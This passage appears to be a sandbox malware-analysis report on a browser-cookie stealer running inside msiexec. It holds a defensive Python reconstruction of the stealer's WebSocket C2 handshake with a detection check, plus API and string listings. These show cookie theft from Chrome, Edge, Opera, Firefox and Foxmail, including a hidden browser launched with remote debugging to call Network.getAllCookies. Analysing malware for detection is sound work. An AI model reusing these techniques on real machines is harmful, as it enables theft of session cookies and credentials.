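and the choice between the two Host: forms are assumptions."""
import base64
import hashlib
import re
from typing import Optional, Tuple

# GUID that RFC 6455 fixes for deriving Sec-WebSocket-Accept from the key.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
# Key hard-coded in the dump.  A conforming client generates a fresh random
# 16-byte key per connection; this one also appears in copied example code.
STATIC_KEY = "x3JJHMbDL1EzLkh9GBhXDw=="
# Equivalent of the four sscanf patterns ws://%[^:/], ws://%[^:/]/%s,
# ws://%[^:/]:%d and ws://%[^:/]:%d/%s: host up to ':' or '/', optional
# decimal port, optional path up to whitespace.
_WS_URL = re.compile(r"ws://([^:/]+)(?::(\d+))?(?:/(\S*))?")


def parse_ws_url(url: str) -> Tuple[str, Optional[int], str]:
    """Return (host, port or None, path) the way the payload's scanf calls would."""
    m = _WS_URL.fullmatch(url)
    if m is None:
        raise ValueError(f"Could not parse WebSocket url: {url}")
    host, port, path = m.group(1), m.group(2), m.group(3)
    return host, (int(port) if port is not None else None), (path or "")


def build_handshake(url: str, origin: str, key: str = STATIC_KEY) -> bytes:
    """Assemble the upgrade request from the recovered format strings.
    The dump holds both 'Host: %s' and 'Host: %s:%d'; the bare form is
    assumed to be used when the URL carried no port."""
    host, port, path = parse_ws_url(url)
    host_line = f"Host: {host}" if port is None else f"Host: {host}:{port}"
    lines = [
        f"GET /{path} HTTP/1.1",
        host_line,
        f"Origin: {origin}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def expected_accept(key: str) -> str:
    """Sec-WebSocket-Accept a server must return for key (RFC 6455 4.2.2):
    base64(SHA-1(key + GUID)).  With a static key this value is static too."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def parse_status(response: bytes) -> int:
    """Read the status code as the payload does with 'HTTP/1.1 %d'.
    Anything but 101 means the upgrade was refused."""
    line = response.split(b"\r\n", 1)[0].decode("ascii", "replace")
    m = re.match(r"HTTP/1\.1 (\d+)", line)
    if m is None:
        raise ValueError(f"Got invalid status line: {line!r}")
    return int(m.group(1))


def flag_static_key_handshake(payload: bytes) -> bool:
    """Detection check over a captured client payload: an upgrade request
    that carries the hard-coded key.  Correlate a hit with the C2 host from
    the configuration rather than treating the key alone as proof."""
    return (b"Upgrade: websocket" in payload
            and f"Sec-WebSocket-Key: {STATIC_KEY}".encode("ascii") in payload)


if __name__ == "__main__":
    # Constructed sample; c2.example is a placeholder, not an indicator.
    req = build_handshake("ws://c2.example:8080/chat", "http://c2.example")
    print(req.decode("ascii"))
    print("server must answer:", expected_accept(STATIC_KEY))
    print("flagged:", flag_static_key_handshake(req))
```

Because the key never changes, the Sec-WebSocket-Accept the server sends back is constant as well (expected_accept(STATIC_KEY)), so both the request and the 101 reply can be matched on the wire; since the same key turns up in widely copied example handshakes, pair such a match with the C2 host from the extracted configuration before acting on it.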

Control-flow Graph

APIs
The function containing these calls (reached from 214D6E4E) resolves its imports at run time instead of through the import table: NtQueryInformationProcess from ntdll, GetFinalPathNameByHandleW from kernel32, and the Restart Manager exports RmStartSession, RmRegisterResources, RmGetList and RmEndSession from Rstrtmgr. Restart Manager reports which processes hold a given file open; together with the OpenProcess, NtQueryInformationProcess, DuplicateHandle, GetFinalPathNameByHandleW and CreateFileMappingW/MapViewOfFile path on the call graph for this dump, this is consistent with reading a file that another process keeps locked by duplicating that process's handle rather than opening the file directly.
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,214D6E4E), ref: 214D7252
• GetProcAddress.KERNEL32(00000000), ref: 214D725B
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,214D6E4E), ref: 214D726C
• GetProcAddress.KERNEL32(00000000), ref: 214D726F
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,214D6E4E), ref: 214D7286
• GetProcAddress.KERNEL32(00000000), ref: 214D7289
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,214D6E4E), ref: 214D729A
• GetProcAddress.KERNEL32(00000000), ref: 214D729D
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,214D6E4E), ref: 214D72AE
• GetProcAddress.KERNEL32(00000000), ref: 214D72B1
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,214D6E4E), ref: 214D72C2
• GetProcAddress.KERNEL32(00000000), ref: 214D72C5
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                          • String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
                                                                                                                                                                                                          • API String ID: 4236061018-788455005
                                                                                                                                                                                                          • Opcode ID: fd5f414821e6ec4e6c3f87a79229b9a323d6366d2f244d1d8e66d3e800a3d6f9
                                                                                                                                                                                                          • Instruction ID: c1be495cf1b774e547cd0fff5479ba295087f95fb2d460280f11a56d0c5a90bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5f414821e6ec4e6c3f87a79229b9a323d6366d2f244d1d8e66d3e800a3d6f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 381112B194021AEDDF21AF728C49F5B3FA8E781256F562436A60C9B344CE3C8158CF51

Control-flow Graph

APIs
• OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 214D7054
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: OpenProcess
• String ID:
• API String ID: 3743895883-0
• Opcode ID: 805764e40d60c6dc8aa25330a8ad57b215aa4d770210387496b741d27a83e0cb
• Instruction ID: c566331bdf0c1fd902d9db0fd43b29f91ed404e8d61cf2fde3935e5970e3cd48
• Opcode Fuzzy Hash: 805764e40d60c6dc8aa25330a8ad57b215aa4d770210387496b741d27a83e0cb
• Instruction Fuzzy Hash: 1171C1B2A40209BFEF119BA4CC45FAE7B79EF15715F100165FA0CE6280EB759A10CBA1

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
• API String ID: 1174141254-1233981215
• Opcode ID: 673c9cc69bef5515d255ea8c005f24b2e49d2b2ef037750415866762b234c6dc
• Instruction ID: 51e1c84c14024b4f67885e9149479a2904cbf78e6e418553affb368ef94ab695
• Opcode Fuzzy Hash: 673c9cc69bef5515d255ea8c005f24b2e49d2b2ef037750415866762b234c6dc
• Instruction Fuzzy Hash: 1472A1729001199FDF18CF64C864BEE7BB1AF65B08F2041ACD409AB291DB759B49CBA1

Control-flow Graph
APIs
• FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 214D5CB2
• FindNextFileW.KERNELBASE(00000000,?), ref: 214D5D2C
• PathFileExistsW.SHLWAPI(?), ref: 214D5E68
• FindNextFileW.KERNEL32(00000000,00000010), ref: 214D5E8C
• FindClose.KERNEL32(00000000), ref: 214D5E97
• FindClose.KERNEL32(00000000), ref: 214D5EDA
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: Find$File$CloseNext$ExistsFirstPath
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 913281501-405221262
• Opcode ID: f82fb119a7acc28c407fac4e2a00e5864b12a490df5230b7f63b683e4b7629fb
• Instruction ID: dd9fb08bf074d257a64502abca28559dd9f0339fdfe0dd4fd6fc01bb1405d821
• Opcode Fuzzy Hash: f82fb119a7acc28c407fac4e2a00e5864b12a490df5230b7f63b683e4b7629fb
• Instruction Fuzzy Hash: BA81A07290014A9EDF05DFA4C868BEEBBB5EF25718F10816DD40DAB390EB359E45CB60

Control-flow Graph
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000000,75080F00), ref: 214D7ED1
• FindNextFileW.KERNELBASE(00000000,?,?,00000000,75080F00), ref: 214D7F0A
• RemoveDirectoryW.KERNEL32(?,?,00000000,75080F00), ref: 214D7FFA
• SetFileAttributesW.KERNEL32(?,00000080,?,00000000,75080F00), ref: 214D802D
• DeleteFileW.KERNEL32(?,?,00000000,75080F00), ref: 214D803A
• GetLastError.KERNEL32(?,00000000,75080F00), ref: 214D806D
• FindClose.KERNEL32(00000000,?,00000000,75080F00), ref: 214D8079
• RemoveDirectoryW.KERNEL32(?,?,00000000,75080F00), ref: 214D8082
• FindClose.KERNEL32(00000000,?,00000000,75080F00), ref: 214D808C
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: f450b07afd8d6b570890b793beb86bfb1d0a9b2c497b33a93fd8217d2bdc642e
• Instruction ID: 976fd52e1287befc61380eaddc804de8be08104b0eac7ffad5800e43e1d75316
• Opcode Fuzzy Hash: f450b07afd8d6b570890b793beb86bfb1d0a9b2c497b33a93fd8217d2bdc642e
• Instruction Fuzzy Hash: 70610F7660010A8ACF119F64C865FF6B376FF16359F5041EDDA0D97381EB329A86CBA0

Control-flow Graph
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 214D78AF
• Process32FirstW.KERNEL32(00000000,?), ref: 214D78D1
• CloseHandle.KERNEL32(00000000), ref: 214D78DC
• FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 214D79D8
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 214D79EC
• ShowWindow.USER32(00000000,00000000), ref: 214D79FA
• Process32NextW.KERNEL32(?,0000022C), ref: 214D7A1B
• CloseHandle.KERNEL32(?), ref: 214D7A2D
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
• String ID:
• API String ID: 3779799082-0
• Opcode ID: 37e464305c51f6f19201729bf3a263e7d77d2bd9dcbcc49149e962ec0c7553b6
• Instruction ID: ae89bd63c3d6aa85944a22701f9814765a3df24f0e8c71a8b09bf9c70c3d2b11
• Opcode Fuzzy Hash: 37e464305c51f6f19201729bf3a263e7d77d2bd9dcbcc49149e962ec0c7553b6
• Instruction Fuzzy Hash: 9E51A073E402299BDF118FA4C894FAEBBB5EB4671AF204199DD19B7380D7309E01CB91

Control-flow Graph
APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21DE1137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 21DE11D0
• FindClose.KERNEL32(00000000), ref: 21DE11DB
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: dee3752bcc52500e8ea4d0f4e8b68ded18d7f7e609b8950268d78a24ba2fc381
• Instruction ID: 271eb71912ac911165c33256ece57d129a5865eeec433a4d63e78accaa71a75c
• Opcode Fuzzy Hash: dee3752bcc52500e8ea4d0f4e8b68ded18d7f7e609b8950268d78a24ba2fc381
• Instruction Fuzzy Hash: 6721E371644319ABD714EA64DC4CF8B7B9CEF84315F040E2EB998D3090EB74D61487A2

Control-flow Graph
APIs
• CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 214D1F5F
• CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 214D1FA8
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: CopyCreateDirectoryFile
• String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
• API String ID: 3761107634-3418363220
• Opcode ID: 4010cf6a9eadb76657c50a60b4b17aa4df3f8cc02326909884b02390aa27af04
• Instruction ID: 09587f9a975a6cfe29dbc6963d2c873809527ba524b58b055a8a8ce831498810
• Opcode Fuzzy Hash: 4010cf6a9eadb76657c50a60b4b17aa4df3f8cc02326909884b02390aa27af04
• Instruction Fuzzy Hash: D2025872A001199FDF14CFA4CCA4FAEBBB5FF64304F5444A9E809AB250D774AE45CBA1

Control-flow Graph
APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21DE1434
  • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21DE1137
  • Part of subcall function 21DE10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1151
  • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE115C
  • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE116D
  • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE117C
  • Part of subcall function 21DE10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1193
  • Part of subcall function 21DE10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21DE11D0
  • Part of subcall function 21DE10F1: FindClose.KERNEL32(00000000), ref: 21DE11DB
• lstrlenW.KERNEL32(?), ref: 21DE14C5
• lstrlenW.KERNEL32(?), ref: 21DE14E0
• lstrlenW.KERNEL32(?,?), ref: 21DE150F
• lstrcatW.KERNEL32(00000000), ref: 21DE1521
• lstrlenW.KERNEL32(?,?), ref: 21DE1547
• lstrcatW.KERNEL32(00000000), ref: 21DE1553
• lstrlenW.KERNEL32(?,?), ref: 21DE1579
• lstrcatW.KERNEL32(00000000), ref: 21DE1585
• lstrlenW.KERNEL32(?,?), ref: 21DE15AB
• lstrcatW.KERNEL32(00000000), ref: 21DE15B7
Strings
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 403a9f6b525123d60196412d0a64fcd628e6a1eea2a394678760329615894d87
• Instruction ID: f4a56a6da0737c7c4c02e77438207a47152c02051597853a8901ef436c07d367
• Opcode Fuzzy Hash: 403a9f6b525123d60196412d0a64fcd628e6a1eea2a394678760329615894d87
• Instruction Fuzzy Hash: E981A171A4036CE9DB20DBA1DC85FEE777DEF84711F00059AF508E7190EAB15A88CBA5

Control-flow Graph
APIs
  • Part of subcall function 214D76D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 214D7722
  • Part of subcall function 214D76D0: Process32FirstW.KERNEL32(00000000,?), ref: 214D7744
  • Part of subcall function 214D76D0: CloseHandle.KERNEL32(00000000), ref: 214D774F
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 214D279E
• Sleep.KERNEL32(0000000A,214F78DE,00000000,?,?,?,?), ref: 214D28D2
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 214D2A9D
• WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 214D2AAB
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 214D2ABA
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 214D2ABF
Strings
• {"id":2,"method":"Browser.close"}, xrefs: 214D2A3B
• {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 214D2962
• --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 214D2737
• localhost, xrefs: 214D296F
• localhost, xrefs: 214D2A48
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
• String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
• API String ID: 3739829977-2677655338
• Opcode ID: febea5ab533869542489d6e4b05fc9bbec73c5ea5e0cca39d9ed9525524a114e
• Instruction ID: afda9844ed2b5152467735cbf8e4b4b3da6b116e1a4b254bd13c6e1088f8e2c1
• Opcode Fuzzy Hash: febea5ab533869542489d6e4b05fc9bbec73c5ea5e0cca39d9ed9525524a114e
• Instruction Fuzzy Hash: FBC1B472D0020A9EEF14DBA0C8A4FEEBBB5EF36704F10419DD90DA3291DB755A45CB62

Control-flow Graph
control_flow_graph 728 214d67d0-214d6849 call 214d4d80 PathFileExistsW 731 214d684b-214d6887 call 214d3970 call 214d6b40 728->731 732 214d6897-214d68b1 call 214d4d80 728->732 746 214d693c 731->746 748 214d688d-214d6892 731->748 738 214d68b3-214d68b9 732->738 739 214d68e2-214d68ec 732->739 741 214d68bb-214d68c0 call 214d4160 738->741 742 214d68c5-214d68dd call 214d3b90 738->742 743 214d68ee-214d68f3 call 214d4160 739->743 744 214d68f8-214d6908 PathFileExistsW 739->744 741->742 742->739 743->744 744->746 747 214d690a-214d6930 call 214d34a0 call 214d6b40 744->747 753 214d6941-214d697a call 214d7d50 call 214d4d80 call 214d6d90 746->753 747->746 761 214d6932-214d6934 747->761 752 214d6937 call 214d4160 748->752 752->746 765 214d697c-214d6982 753->765 766 214d69ab-214d69b1 753->766 761->752 767 214d698e-214d69a6 call 214d3b90 765->767 768 214d6984-214d6989 call 214d4160 765->768 769 214d69bd-214d69d7 766->769 770 214d69b3-214d69b8 call 214d4160 766->770 767->766 768->767 774 214d69d9-214d69de call 214d4160 769->774 775 214d69e3-214d6a01 769->775 770->769 774->775 777 214d6a0d-214d6a21 PathFileExistsW 775->777 778 214d6a03-214d6a08 call 214d4160 775->778 779 214d6ae9-214d6aed 777->779 780 214d6a27-214d6a4f call 214d7d50 call 214d4a00 777->780 778->777 779->753 783 214d6af3-214d6af9 779->783 793 214d6a8c-214d6a92 780->793 794 214d6a51-214d6a55 780->794 785 214d6afb-214d6b00 call 214d4160 783->785 786 214d6b05-214d6b1f 783->786 785->786 789 214d6b2b-214d6b3d 786->789 790 214d6b21-214d6b26 call 214d4160 786->790 790->789 796 214d6a9c-214d6aa1 793->796 797 214d6a94-214d6a97 call 214d6bc0 793->797 794->793 795 214d6a57-214d6a70 794->795 800 214d6a7a-214d6a87 795->800 801 214d6a72-214d6a75 call 214d6bc0 795->801 798 214d6aa9-214d6ab3 796->798 799 214d6aa3 796->799 797->796 804 214d6abf-214d6add 798->804 805 214d6ab5-214d6aba call 214d4160 798->805 803 214d6aa4 call 214d5030 799->803 800->798 807 214d6a89-214d6a8a 800->807 801->800 803->798 804->779 810 214d6adf-214d6ae4 call 214d4160 804->810 805->804 807->803 810->779
APIs
• PathFileExistsW.SHLWAPI(?), ref: 214D6845
• PathFileExistsW.SHLWAPI(?), ref: 214D6904
• PathFileExistsW.SHLWAPI(?), ref: 214D6A19
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
• API String ID: 1174141254-1565956251
• Opcode ID: 8e6bbfcddcfb07d3fd086a4dbf2a348ebab0b3ba842e8618683b64aab2ea3b25
• Instruction ID: f147e8e3d1e14d6b1be4c98c29dea451f2d75ce87953484d85ec6f02c067fbcd
• Opcode Fuzzy Hash: 8e6bbfcddcfb07d3fd086a4dbf2a348ebab0b3ba842e8618683b64aab2ea3b25
• Instruction Fuzzy Hash: 27A13972D00209AEDF01CFA8D8A4BAEBBB5FF65704F60805DE459E7250D774AA05CBA1

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • D, xrefs: 214D263C
                                                                                                                                                                                                          • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 214D2962
                                                                                                                                                                                                          • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 214D2737
                                                                                                                                                                                                          • localhost, xrefs: 214D296F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
                                                                                                                                                                                                          • API String ID: 0-36197314
                                                                                                                                                                                                          • Opcode ID: c52fb2a3a6cd7894b2994aafdbf96bcd1283acba5b9de39f668544e7b6b33365
                                                                                                                                                                                                          • Instruction ID: d33a9a79c9b7b593f053031dd9fde10f519f52573fcc6faf09e5058c963b08f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52fb2a3a6cd7894b2994aafdbf96bcd1283acba5b9de39f668544e7b6b33365
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E515872C042599EEF24CFA4CC94FDEBBB5AF25304F104199E90DB3291EB745A88CB61

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                          control_flow_graph 969 214d85d8-214d85df 970 214d85e1 969->970 971 214d85e3-214d85f8 getaddrinfo 969->971 970->971 972 214d85fa-214d8641 FormatMessageA call 214ddd3f call 214d84c0 971->972 973 214d8642-214d8647 971->973 975 214d8649-214d864f 973->975 976 214d8688-214d8697 FreeAddrInfoW 973->976 978 214d8650-214d8664 socket 975->978 979 214d867e-214d8683 978->979 980 214d8666-214d8676 connect 978->980 979->978 983 214d8685 979->983 982 214d8678-214d867b closesocket 980->982 980->983 982->979 983->976
                                                                                                                                                                                                          APIs
